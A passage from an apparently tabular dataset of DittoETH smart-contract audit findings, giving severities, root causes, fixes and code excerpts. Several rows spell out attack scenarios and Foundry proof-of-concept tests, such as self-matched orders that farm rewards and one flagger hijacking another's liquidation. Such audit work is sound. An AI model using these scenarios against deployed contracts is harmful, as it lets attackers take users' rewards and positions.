shares`",```\\n- uint88 shares = eth * (timeTillMatch / 1 days);\\n+ uint88 shares = uint88(uint256(eth * timeTillMatch) / 1 days);\\n```\\n,Up to 7.1% of user's shares will be truncated,```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n +Using a cached price in the critical shutdownMarket(),medium,"The `MarketShutdownFacet::shutdownMarket()` is a critical function allowing anyone to freeze the market permanently. The function determines whether or not the market will be frozen based on the asset collateral ratio calculated from a cached price, which can be outdated (too risky for this critical function).\\nOnce the market is frozen, no one can unfreeze it.\\nThe `shutdownMarket()` allows anyone to call to freeze the market permanently when the asset collateral ratio threshold (default of 1.1 ether) has been reached. Once the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market. Therefore, the `shutdownMarket()` becomes one of the most critical functions.\\nTo calculate the asset collateral ratio (cRatio), the `shutdownMarket()` executes the `_getAssetCollateralRatio()`. However, the `_getAssetCollateralRatio()` calculates the `cRatio` using the cached price loaded from the `LibOracle::getPrice()`.\\nUsing the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated. The function should consider only a fresh price queried from Chainlink.\\n```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L36\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L37\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L44\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L99","Using a cached price in the critical shutdownMarket()\\nThe `shutdownMarket()` requires the most accurate price, not just a cached price. Execute the `LibOracle::getOraclePrice()` to get the accurate price from Chainlink.","Using the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated.\\nOnce the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market.","```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n" +Malicious trader can intentionally obtain `dittoMatchedShares` in some edges cases,low,"Malicious trader can intentionally obtain `dittoMatchedShares` by creating a bid order using a low price that nobody will ask, then wait for more than 14 days and the same malicious trader create an ask order using the same bid's low price causing the increase of `dittoMatchedShares`.\\nMalicious trader can create a bid order using the BidOrdersFacet::createBid() function at very low price, then the same malicious trader can wait some days until the minumum required in order to get `dittoMatchedShares` and set a `ask` order using the bid's low price. Please consider the next scenario:\\n```\\nMarket status:\\nassetX: current price 100\\n```\\n\\nMalicious trader creates the `bid order` for the `assetX` using the `price: 10` (low price compared to the current 100 price) and `ercAmount 10`. The low price is because nobody wants to sell at that price so the order can stay there without be matched.\\nThe `bid order` will be submitted to the order book because there are not `asks/sells` to fill at that price.\\nMalicious trader waits for more than 14 days. Additionally the malicious trader needs to wait until there are not `asks/sells` in the order book.\\nOnce the step 3 is ok, the Malicious trader creates the `ask order` at `price 10 and ercAmount10` (the bid's order price from step 1). The order is matched with the `bid order` from the step 1 and `dittoMatchedShares` are assigned to the malicious trader.\\nIt is a very edge case because the malicious trader needs an empty `ask/sells` orderbook so he can put his own `ask order` at the malicious bid order price but in conditions where the asset is not very trader the malicious actor can benefit from this.",Verify that the address from the `bid order` is not the same address who is creating the `ask` order.,"Malicious actor can intentionally obtain `dittoMatchedShares` using `bid/asks` orders that he intentionally crafts. The `bid/ask` orders are created by the same malicious actor, so he won't lose assets.\\nTools used\\nManual review",```\\nMarket status:\\nassetX: current price 100\\n```\\n +Primary liquidation fee distribution may revert due to the inability to cover the caller fees,medium,"Fee distribution during the primary short liquidation may revert due to an arithmetic underflow error in case the TAPP's escrowed ETH balance is insufficient to cover the caller (liquidator) fees.\\nDuring the primary liquidation, the `_marginFeeHandler` function called in line 126 handles the fee distribution for the liquidator (i.e., caller).\\nIf the eligible caller fee (callerFee) is less or equal to the ETH escrowed by the TAPP, the fee is deducted from `TAPP.ethEscrowed` and added to the liquidators escrowed ETH balance, `VaultUser.ethEscrowed`, in lines 271-274.\\nOtherwise, if the TAPP's escrowed ETH is insufficient to cover the caller fees, i.e., the `else` branch in line 274, the caller is given the `tappFee` instead of `gasFee`.\\nHowever, if `m.totalFee` exceeds the TAPP's `ethEscrowed`, it reverts with an arithmetic underflow error in line 278. This can be the case if the TAPP has little to no ETH escrowed after placing the forced bid as part of the liquidation, attempting to buy the debt token amount required to repay the short position's debt. In case the short's collateral is not sufficient to buy the debt tokens, the TAPP's escrowed ETH is utilized as well, potentially depleting the TAPP's escrowed ETH.\\nConsequently, the remaining `TAPP.ethEscrowed` is potentially lower than the calculated `m.totalFee`, resulting in the arithmetic underflow error in line 278.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L278\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n","Primary liquidation fee distribution may revert due to the inability to cover the caller fees\\nConsider checking if the TAPP's `ethEscrowed` is sufficient to cover the `m.totalFee` before deducting the fee from the TAPP's `ethEscrowed` balance and if not, give the caller the TAPP's `ethEscrowed` balance.","The primary short liquidation fails, requiring to wait until the short position's collateral is sufficient to buy the debt tokens or the TAPP has sufficient collateral, or, if the short's collateral ratio further decreases, the short position is liquidated via the secondary liquidation (which adds additional risk to the peg of the asset as the overall collateral ratio could fall below 100%).",```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n +Flag can be overriden by another user,high,"The `setFlagger` function allows a new flagger to reuse `flaggerHint` flag id after `LibAsset.firstLiquidationTime` has passed after flagId has been updated.\\n```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L377-L404C13\\nSince the previous flagger can only liquidate the flagged short after `LibAsset.firstLiquidationTime` has passed, the flagged short will be unliquidated till that time. Both the ability to flag the short for first flagger and the ability to replace the first flagger starts at the same instant. This allows a new flagger to take control over the liquidation of the flagged short by finding some other liquidatable short and passing in the flagId of the previous flagger as the `flagHint`.\\nPOC Test\\n```\\ndiff --git a/test/MarginCallFlagShort.t.sol b/test/MarginCallFlagShort.t.sol\\nindex 906657e..3d7f985 100644\\n--- a/test/MarginCallFlagShort.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/MarginCallFlagShort.t.sol\\n@@ -169,6 // Add the line below\\n169,90 @@ contract MarginCallFlagShortTest is MarginCallHelper {\\n assertEq(diamond.getFlagger(shortRecord.flaggerId), extra);\\n }\\n \\n// Add the line below\\n function test_FlaggerId_Override_Before_Call() public {\\n// Add the line below\\n address flagger1 = address(77);\\n// Add the line below\\n address flagger2 = address(78);\\n// Add the line below\\n\\n// Add the line below\\n vm.label(flagger1, ""flagger1"");\\n// Add the line below\\n vm.label(flagger2, ""flagger2"");\\n// Add the line below\\n\\n// Add the line below\\n //create first short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord1 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 1);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 0);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag first short\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n diamond.flagShort(asset, sender, shortRecord1.id, Constants.HEAD);\\n// Add the line below\\n shortRecord1 = diamond.getShortRecord(asset, sender, shortRecord1.id);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger1);\\n// Add the line below\\n\\n// Add the line below\\n skip(TEN_HRS_PLUS);\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n\\n// Add the line below\\n //attempting direct liquidation by flagger2 fails since only allowed to flagger1\\n// Add the line below\\n\\n// Add the line below\\n //add ask order to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n uint16[] memory shortHintArray = setShortHintArray();\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //cancel the previously created ask order\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //reset\\n// Add the line below\\n setETH(4000 ether);\\n// Add the line below\\n\\n// Add the line below\\n //create another short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 0);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord2.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag second short by providing flagger id of flagger1. this resets the flagger id\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.flagShort(\\n// Add the line below\\n asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1, uint16(shortRecord1.flaggerId)\\n// Add the line below\\n );\\n// Add the line below\\n shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n //flagger1 has been replaced\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord2.flaggerId), flagger2);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger2);\\n// Add the line below\\n\\n// Add the line below\\n //ask to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //now flagger1 cannot liquidate shortRecord1\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //but flagger1 can\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function test_FlagShort_FlaggerId_Recycling_AfterIncreaseCollateral() public {\\n createAndFlagShort();\\n \\n```\\n","Update the check to `secondLiquidationTime`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibShortRecord.sol b/contracts/libraries/LibShortRecord.sol\\nindex 7c5ecc3..c8736b0 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibShortRecord.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibShortRecord.sol\\n@@ // Remove the line below\\n391,7 // Add the line below\\n391,7 @@ library LibShortRecord {\\n // Remove the line below\\n s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re// Remove the line below\\nuse an inactive flaggerId\\n// Remove the line below\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n// Add the line below\\n if (timeDiff > LibAsset.secondLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n } else if (s.flaggerIdCounter < type(uint16).max) {\\n```\\n",First flagger will be in loss of the spent gas and expected reward.,"```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n" +Combining shorts can incorrectly reset the shorts flag,medium,"The protocol allows users to combine multiple short positions into one as long as the combined short stays above the primary collateral ratio. The function is also able to reset an active flag from any of the combined shorts if the final ratio is above the primaryLiquidationCR.\\nThe issue is that the combineShorts function does not call updateErcDebt, which is called in every other function that is able to reset a shorts flag. This means that if the debt is outdated the final combined short could incorrectly reset the flag putting the position on a healthy ratio when it really isn't. This would also mean that it will have to be reflagged and go through the timer again before it can be liquidated.\\nThe combine shorts function merges all short records into the short at position id[0]. Focusing on the debt aspect it adds up the total debt and calculates the ercDebtSocialized of all positions except for the first.\\n```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n\\nIt then merges this total to the first position using the merge function and this will give us the combined short.\\n```\\n// Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n```\\n\\nFinally we check if the position had an active flag and if it did, we check if the new combined short is in a healthy enough state to reset the flag, if not the whole function reverts.\\n```\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n```\\n\\nAs you can see the updateErcDebt function is not called anywhere in the function meaning the flag could be reset with outdated values.","Call updateErcDebt on the short once it is combined in the combineShorts function to ensure the collateral ratio is calculated with the most up to date values.\\n```\\n function combineShorts(address asset, uint8[] memory ids)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, ids[0])\\n {\\n // Initial code\\n\\n // Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n\\n firstShort.updateErcDebt(asset); // update debt here before checking flag\\n\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n emit Events.CombineShorts(asset, msg.sender, ids);\\n }\\n```\\n",A short could have its flag incorrectly reset and reset the timer. This is not good for the protocol as it will have a unhealthy short for a longer time.,```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n +Event in secondaryLiquidation could be misused to show false liquidations,low,"The `liquidateSecondary` function in the protocol is designed to emit events detailing the specifics of liquidation, which can be crucial for other protocols or front-end integrations that track secondary liquidations within the protocol. One of the values emitted is `batches`, which indicates which positions got liquidated. However the function emits the `batches` array as it initially receives it, even though it may skip positions that are not eligible for liquidation during its execution. This implies that the emitted event could represent incorrect data, indicating positions as liquidated even if they were not, due to their ineligibility.\\n```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n","Event in secondaryLiquidation could be misused to show false liquidations\\nModify the `batches` array before emitting it in the event, ensuring it accurately reflects the positions that were actually liquidated.","This inconsistency in the emitted event data can lead to incorrect data, indicating positions as liquidated even if they were not.","```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n" +`Errors.InvalidTwapPrice()` is never invoked when `if (twapPriceInEther == 0)` is true,low,"The protocol expects to `revert` with `Errors.InvalidTwapPrice()` when twapPriceInEther == 0:\\n```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n\\nHowever, the control never reaches Line 88 when `twapPriceInEther` is zero. It rather reverts before that with error `Division or modulo by 0`.\\nNOTE: Due to this bug, `Errors.InvalidTwapPrice()` is never invoked/thrown by the protocol even under satisfactory conditions, even though it has been defined.\\nSince I could not find any helper function inside `contracts/` or `test/` which lets one set the `twapPrice` returned by uint256 `twapPrice` = IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes); to zero for testing purposes, I have created a simplified PoC which targets the problem area:\\nSave the following as a file named `test/InvalidTwapPriceErrorCheck.t.sol` and run the test via `forge test --mt testInvalidTwapPriceErrNeverInvoked -vv`. You will find that the test reverts with error `Division or modulo by 0`, but not with `Errors.InvalidTwapPrice()`. The PoC uses the same underlying math libraries and logic path as the protocol does in `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()`.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Constants} from ""contracts/libraries/Constants.sol"";\\nimport {Errors} from ""contracts/libraries/Errors.sol"";\\nimport {U256} from ""contracts/libraries/PRBMathHelper.sol"";\\nimport {OBFixture} from ""test/utils/OBFixture.sol"";\\n\\ncontract InvalidTwapPriceErrorCheck is OBFixture {\\n using U256 for uint256;\\n\\n function getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n // Following code is copied as-is from\\n // `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()#L85-L89`\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n }\\n }\\n\\n function getZeroTwapPriceInEther_CorrectStyle()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n if (twapPriceInEther == 0) { \\n revert Errors.InvalidTwapPrice();\\n }\\n twapPriceInv = twapPriceInEther.inv();\\n }\\n\\n function testInvalidTwapPriceErrNeverInvoked() public pure {\\n getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol();\\n }\\n\\n function testInvalidTwapPriceErrInvokedCorrectly() public {\\n vm.expectRevert(Errors.InvalidTwapPrice.selector);\\n getZeroTwapPriceInEther_CorrectStyle();\\n }\\n}\\n```\\n\\n\\nIn the above test file, you can also run the test which invokes the ""fixed"" or ""correct"" code style via `forge test --mt testInvalidTwapPriceErrInvokedCorrectly -vv`. This will invoke the `Errors.InvalidTwapPrice` error, as expected.",The check on Line 87 (if condition) needs to be performed immediately after Line 85.\\n```\\n 85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n 86 if (twapPriceInEther == 0) {\\n// Add the line below\\n 87 revert Errors.InvalidTwapPrice();\\n// Add the line below\\n 88 }\\n// Add the line below\\n 89 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 86 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 87 if (twapPriceInEther == 0) {\\n// Remove the line below\\n 88 revert Errors.InvalidTwapPrice();\\n// Remove the line below\\n 89 }\\n```\\n\\nThe above fix needed to be done because the `inv()` call caused a revert even before control used to reach the `if` condition.,Protocol owner or developer monitoring for a revert due to `Errors.InvalidTwapPrice()` in the logs will never see it and will make debugging & issue resolution harder.,```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n +Rounding-up of user's `cRatio` causes loss for the protocol,medium,"At multiple places in the code, user's collateral ratio has been calculated in a manner which causes loss of precision (rounding-up) due to division before multiplication. This causes potential loss for the DittoETH protocol, among other problems.\\nRoot Cause\\nUse of the following piece of code causes rounding-up:\\nStyle 1\\n```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n\\nStyle 2\\n```\\nuint256 oraclePrice = LibOracle.getOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getPrice(asset);\\n // rest of code\\n // rest of code\\n // rest of code\\nuint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n```\\n\\n\\nLet's break the issue down into 4 smaller parts:\\nPART 1:\\nLet us first look inside getOraclePrice():\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 20 function getOraclePrice(address asset) internal view returns (uint256) {\\n 21 AppStorage storage s = appStorage();\\n 22 AggregatorV3Interface baseOracle = AggregatorV3Interface(s.baseOracle);\\n 23 uint256 protocolPrice = getPrice(asset);\\n 24 // prettier-ignore\\n 25 (\\n 26 uint80 baseRoundID,\\n 27 int256 basePrice,\\n 28 /*uint256 baseStartedAt*/\\n 29 ,\\n 30 uint256 baseTimeStamp,\\n 31 /*uint80 baseAnsweredInRound*/\\n 32 ) = baseOracle.latestRoundData();\\n 33\\n 34 AggregatorV3Interface oracle = AggregatorV3Interface(s.asset[asset].oracle);\\n 35 if (address(oracle) == address(0)) revert Errors.InvalidAsset();\\n 36\\n 37 if (oracle == baseOracle) {\\n 38 //@dev multiply base oracle by 10**10 to give it 18 decimals of precision\\n 39 uint256 basePriceInEth = basePrice > 0\\n 40 ? uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()\\n 41 : 0;\\n 42 basePriceInEth = baseOracleCircuitBreaker(\\n 43 protocolPrice, baseRoundID, basePrice, baseTimeStamp, basePriceInEth\\n 44 );\\n 45 return basePriceInEth;\\n 46 } else {\\n 47 // prettier-ignore\\n 48 (\\n 49 uint80 roundID,\\n 50 int256 price,\\n 51 /*uint256 startedAt*/\\n 52 ,\\n 53 uint256 timeStamp,\\n 54 /*uint80 answeredInRound*/\\n 55 ) = oracle.latestRoundData();\\n 56 uint256 priceInEth = 